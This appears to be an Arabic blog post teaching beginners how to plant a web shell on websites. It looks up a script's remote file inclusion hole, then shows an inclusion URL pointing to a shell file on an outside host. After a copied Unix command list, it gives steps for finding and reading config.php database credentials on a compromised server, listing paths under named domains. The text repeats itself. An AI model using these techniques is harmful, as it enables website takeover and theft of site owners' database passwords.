بسم الله الرحمن الرحيم
السلام عليكم ورحمته الله وبركاته
كيف يتم رفع الشيل على المواقع
الكثير من المبدأأأأيين يسأأألون كيف يتم رفع الشيل على الموقع
---------------------------------------------
طيب انا بوضح لك فكرة بسيطة جدا وإن شاء الله تفهم الفكرة
طيب نفترض أنك تريد أختراق موقع
الموقع موجودة علية
سكربت الصور
سكربت مكتبة الصور
سكرتب مركز التحميل
سكربت النيوك
سكربت vb
سكربت الـcaht
طبعا هذا السكربت مشهورة جدا جدا
وحالة الخطر خطيرة جدا جدا
أأأأأيش تملك هذا السكربت أيش تملك من ثغرة
نفترض تملك ثغرة فأأأأيل أنكلود
طيب نقوم بنسخ أسم السكربت
نروح على موقع مليورم أو موقع السكيورتي
وغيرها
-----------------------------------------------------
نروح على محرك البحث للموقع
نوضع اسم السكربت وجدنأأأأ السكربت يملك ثغرة فأأأيل أنكلود
طبعا أكثر 100\90
سكربتات تملك ثغرة فأأأأأيل أنكلود
طيب نفترض أن السكيورتي حصلت استغلال ثغرة أخر والله نفس السكربت
بس أصدار ثأأأني انا بقول لك شئ الكواد الذي في السكربت ما تتغير تظل هي هي
طيب خليك معايا قليل نفترض تريد أختراق هذا الموقع
www.^_^.com/img
طبعا سكربت الصور
نشوف
www.^_*.com/img/includes/root_paht=http://*_^.com/r 5 7 s h e l l .txt?
هل رأأأيت كيف تم رابط الثغرة طبعا الثغرة عملت نسخ لصق
من موقع السكيورتي
وبكذا أأأأأأأنت رفعت الشيل على الموقع.
هذا هي طريقة رفع الشيل على الموقع
وأنتهي الدرس تشأأأأأأأأأأأأأأأأأأأأأأأأأأأأأأو
ارجو ان تكونو قد استفتم ولو القليل ........
اخوكم بالله
HaCkEr-JoRdan
السلام عليكم ورحمته الله وبركاته
كيف يتم رفع الشيل على المواقع
الكثير من المبدأأأأيين يسأأألون كيف يتم رفع الشيل على الموقع
---------------------------------------------
طيب انا بوضح لك فكرة بسيطة جدا وإن شاء الله تفهم الفكرة
طيب نفترض أنك تريد أختراق موقع
الموقع موجودة علية
سكربت الصور
سكربت مكتبة الصور
سكرتب مركز التحميل
سكربت النيوك
سكربت vb
سكربت الـcaht
طبعا هذا السكربت مشهورة جدا جدا
وحالة الخطر خطيرة جدا جدا
أأأأأيش تملك هذا السكربت أيش تملك من ثغرة
نفترض تملك ثغرة فأأأأيل أنكلود
طيب نقوم بنسخ أسم السكربت
نروح على موقع مليورم أو موقع السكيورتي
وغيرها
-----------------------------------------------------
نروح على محرك البحث للموقع
نوضع اسم السكربت وجدنأأأأ السكربت يملك ثغرة فأأأيل أنكلود
طبعا أكثر 100\90
سكربتات تملك ثغرة فأأأأأيل أنكلود
طيب نفترض أن السكيورتي حصلت استغلال ثغرة أخر والله نفس السكربت
بس أصدار ثأأأني انا بقول لك شئ الكواد الذي في السكربت ما تتغير تظل هي هي
طيب خليك معايا قليل نفترض تريد أختراق هذا الموقع
www.^_^.com/img
طبعا سكربت الصور
نشوف
www.^_*.com/img/includes/root_paht=http://*_^.com/r 5 7 s h e l l .txt?
هل رأأأيت كيف تم رابط الثغرة طبعا الثغرة عملت نسخ لصق
من موقع السكيورتي
وبكذا أأأأأأأنت رفعت الشيل على الموقع.
هذا هي طريقة رفع الشيل على الموقع
وأنتهي الدرس تشأأأأأأأأأأأأأأأأأأأأأأأأأأأأأأو
ارجو ان تكونو قد استفتم ولو القليل ........
اخوكم بالله
HaCkEr-JoRdan*****************************
وهاي اوامر التنفيذ على الشل
>بعض اوامر الشيل
>
>-----------------------------------------------------
>A
>access : لفحص ملف من حيث امكانيه القراءة , الكتابة ..
>at : لتنفيذ امر في تاريخ ووقت معين
>alarm : لعمل منبه
>accept : لقبول اتصال على سوكيت .
>
>
>B
>batch : لتنفيذ امر عندما يحصل على تصريح
>buildhash : مدقق املائي
>
>
>C
>cat : لعرض محتوى اكثر من ملف مع بعض
>cd : لتغير الدليل الذي انت عليه
>chmod : لتغير تصريح دخلول ملف معين
>chown : لتغير مالك ملف معين
>clear : لمسح كل الذي على الشاشة
>cmp : لمقارنة ملفين
>cp : لنسخ الملفات
>crypt : لتشفير و فك تشفير الملفات
>csplit : لتقسيم الملف الى عدة ملفات
>cu : لطلب تريمنال يونكس اخر
>
>
>D
>date : لاظهار التاريخ و الساعة
>df : لتقديم تقرير عن مساحه القرص ( المساحه الخالية .. )
>diff : لمقارنه ملفين
>diff3 : لمقارنه 3 ملفات او اكثر
>dircmp : لمقارنه دليلان
>du : تقرير عن مساحه القرض المستخدم
>
>
>E
>echo : يستخدم لاظهار سطر نكتب فيه تيكست
>**** editor : ed ( مثل الورد يعني )
>egrep : مثل الامر grep
>**** editor : ex ( مثل الورد يعني )
>
>
>F
>file : للتقرير عن نوع ملف
>find : للبحث عن ملفات
>finger : تقرير عن مستخدم
>
>
>G
>++g : كومبيلر لل C++ و C
>gcc : كومبيلر لل C++ و C
>grep : يستخدم للبحث عن شئ داخل ملف
>gzip : لضغط ملفات
>gunzip : لضغط ملفات
>
>
>H
>haltsys : لاغلاق النظام
>head : لاظهار اول 10 اسطر من الملف
>
>
>I
>ispell : مدقق املائي
>
>
>K
>** kill : لانهاء عمليه
>
>
>L
>line : لقراءة ملف سطر معين في ملف
>ln : لعمل لينك ملف معين
>logname : للحصول على اسم الدخول الخاص بك
>lpr : ارسال طلب للطباعه
>lprint : للطباعه بالطابعه المحليه
>lpstat : لتقديم تقرير عن حاله الطباعه
>lpq : لتقديم تقرير عن حاله الطباعه
>ls : لعرض محتويات مجلد
>
>
>M
>mail : لارسال و استقبال ايميلات
>*** : للحصول على معلومات عن اي امر
>mkdir : لعمل دليل جديد
>more : لعرض الملفات
>
>
>P
>passwd : لانشاء كملة سر او تغيره
>Page Ranking : لطباعه ملف
>ps : العمليات عن العمليات التي تم تشغيلها
>pstat : لعرض حالة النظام
>pwd : لعرض المسار الذي انت فيه الان
>
>
>R
>rm : لمسح ملفات او مجلدات ( خاليه )
>rmdir : لمسح مجلد ( خالي )
>اوامر الشيل منقولة من
>Pharaonics Team
>----------------------------------------
>نبداء بالسهل الاول
>وهو البحث عن كلمات السر لقواعدالبيانات
>لو عاوز تخترق قواعد البيانات وكلمات السر الغير مشفرة اكتب
>find / -name config.php
>
>هيجيلك كل البرامج الى فيها الكونفيج على السرفر بهذا الشكل
>--------------------------------------------------------------------------------
>usr/local/plesk/apache/vhosts/idks.ws/httpdocs/phpsite/config.php
>usr/local/plesk/apache/vhosts/idks.ws/httpdocs/phpsite/_vti_cnf/config.php
>usr/local/plesk/apache/vhosts/idks.ws/httpdocs/forum/config.php
>usr/local/plesk/apache/vhosts/dudewherestherave.net/httpdocs/phpBB2/config.php
>usr/local/plesk/apache/vhosts/ukraine-today.com/httpdocs/config.php
>usr/local/plesk/apache/vhosts/galazxy.com/httpdocs/forum/config.php
>usr/local/plesk/apache/vhosts/galazxy.com/httpdocs/k21/modules/mylinks/cache/config.php
>usr/local/plesk/apache/vhosts/galazxy.com/httpdocs/k21/modules/newbb/config.php
>usr/local/plesk/apache/vhosts/galazxy.com/httpdocs/k21/modules/news/cache/config.php
>usr/local/plesk/apache/vhosts/galazxy.com/httpdocs/k21/modules/system/cache/config.php
>usr/local/plesk/apache/vhosts/eliteclans.net/httpdocs/blacktalons/admin/config.php
>usr/local/plesk/apache/vhosts/eliteclans.net/httpdocs/forum/config.php
>usr/local/plesk/apache/vhosts/kunjip.net/httpdocs/bbs/config.php
>usr/local/plesk/apache/vhosts/thirdeye-dod.com/httpdocs/forum/config.php
>usr/local/plesk/apache/vhosts/thirdeye-dod.com/httpdocs/phpBB2/config.php
>--------------------------------------------------------------------------------
>وعلشان تعرف تشوف الى داخل الملف تكتب
>
>cat /usr/local/plesk/apache/vhosts/thirdeye-dod.com/httpdocs/phpBB2/config.php
>بعض اوامر الشيل
>
>-----------------------------------------------------
>A
>access : لفحص ملف من حيث امكانيه القراءة , الكتابة ..
>at : لتنفيذ امر في تاريخ ووقت معين
>alarm : لعمل منبه
>accept : لقبول اتصال على سوكيت .
>
>
>B
>batch : لتنفيذ امر عندما يحصل على تصريح
>buildhash : مدقق املائي
>
>
>C
>cat : لعرض محتوى اكثر من ملف مع بعض
>cd : لتغير الدليل الذي انت عليه
>chmod : لتغير تصريح دخلول ملف معين
>chown : لتغير مالك ملف معين
>clear : لمسح كل الذي على الشاشة
>cmp : لمقارنة ملفين
>cp : لنسخ الملفات
>crypt : لتشفير و فك تشفير الملفات
>csplit : لتقسيم الملف الى عدة ملفات
>cu : لطلب تريمنال يونكس اخر
>
>
>D
>date : لاظهار التاريخ و الساعة
>df : لتقديم تقرير عن مساحه القرص ( المساحه الخالية .. )
>diff : لمقارنه ملفين
>diff3 : لمقارنه 3 ملفات او اكثر
>dircmp : لمقارنه دليلان
>du : تقرير عن مساحه القرض المستخدم
>
>
>E
>echo : يستخدم لاظهار سطر نكتب فيه تيكست
>**** editor : ed ( مثل الورد يعني )
>egrep : مثل الامر grep
>**** editor : ex ( مثل الورد يعني )
>
>
>F
>file : للتقرير عن نوع ملف
>find : للبحث عن ملفات
>finger : تقرير عن مستخدم
>
>
>G
>++g : كومبيلر لل C++ و C
>gcc : كومبيلر لل C++ و C
>grep : يستخدم للبحث عن شئ داخل ملف
>gzip : لضغط ملفات
>gunzip : لضغط ملفات
>
>
>H
>haltsys : لاغلاق النظام
>head : لاظهار اول 10 اسطر من الملف
>
>
>I
>ispell : مدقق املائي
>
>
>K
>** kill : لانهاء عمليه
>
>
>L
>line : لقراءة ملف سطر معين في ملف
>ln : لعمل لينك ملف معين
>logname : للحصول على اسم الدخول الخاص بك
>lpr : ارسال طلب للطباعه
>lprint : للطباعه بالطابعه المحليه
>lpstat : لتقديم تقرير عن حاله الطباعه
>lpq : لتقديم تقرير عن حاله الطباعه
>ls : لعرض محتويات مجلد
>
>
>M
>mail : لارسال و استقبال ايميلات
>*** : للحصول على معلومات عن اي امر
>mkdir : لعمل دليل جديد
>more : لعرض الملفات
>
>
>P
>passwd : لانشاء كملة سر او تغيره
>Page Ranking : لطباعه ملف
>ps : العمليات عن العمليات التي تم تشغيلها
>pstat : لعرض حالة النظام
>pwd : لعرض المسار الذي انت فيه الان
>
>
>R
>rm : لمسح ملفات او مجلدات ( خاليه )
>rmdir : لمسح مجلد ( خالي )
>اوامر الشيل منقولة من
>Pharaonics Team
>----------------------------------------
>نبداء بالسهل الاول
>وهو البحث عن كلمات السر لقواعدالبيانات
>لو عاوز تخترق قواعد البيانات وكلمات السر الغير مشفرة اكتب
>find / -name config.php
>
>هيجيلك كل البرامج الى فيها الكونفيج على السرفر بهذا الشكل
>--------------------------------------------------------------------------------
>usr/local/plesk/apache/vhosts/idks.ws/httpdocs/phpsite/config.php
>usr/local/plesk/apache/vhosts/idks.ws/httpdocs/phpsite/_vti_cnf/config.php
>usr/local/plesk/apache/vhosts/idks.ws/httpdocs/forum/config.php
>usr/local/plesk/apache/vhosts/dudewherestherave.net/httpdocs/phpBB2/config.php
>usr/local/plesk/apache/vhosts/ukraine-today.com/httpdocs/config.php
>usr/local/plesk/apache/vhosts/galazxy.com/httpdocs/forum/config.php
>usr/local/plesk/apache/vhosts/galazxy.com/httpdocs/k21/modules/mylinks/cache/config.php
>usr/local/plesk/apache/vhosts/galazxy.com/httpdocs/k21/modules/newbb/config.php
>usr/local/plesk/apache/vhosts/galazxy.com/httpdocs/k21/modules/news/cache/config.php
>usr/local/plesk/apache/vhosts/galazxy.com/httpdocs/k21/modules/system/cache/config.php
>usr/local/plesk/apache/vhosts/eliteclans.net/httpdocs/blacktalons/admin/config.php
>usr/local/plesk/apache/vhosts/eliteclans.net/httpdocs/forum/config.php
>usr/local/plesk/apache/vhosts/kunjip.net/httpdocs/bbs/config.php
>usr/local/plesk/apache/vhosts/thirdeye-dod.com/httpdocs/forum/config.php
>usr/local/plesk/apache/vhosts/thirdeye-dod.com/httpdocs/phpBB2/config.php
>--------------------------------------------------------------------------------
>وعلشان تعرف تشوف الى داخل الملف تكتب
>
>cat /usr/local/plesk/apache/vhosts/thirdeye-dod.com/httpdocs/phpBB2/config.php
تحرير: حمزة المشاقبة
ليست هناك تعليقات:
إرسال تعليق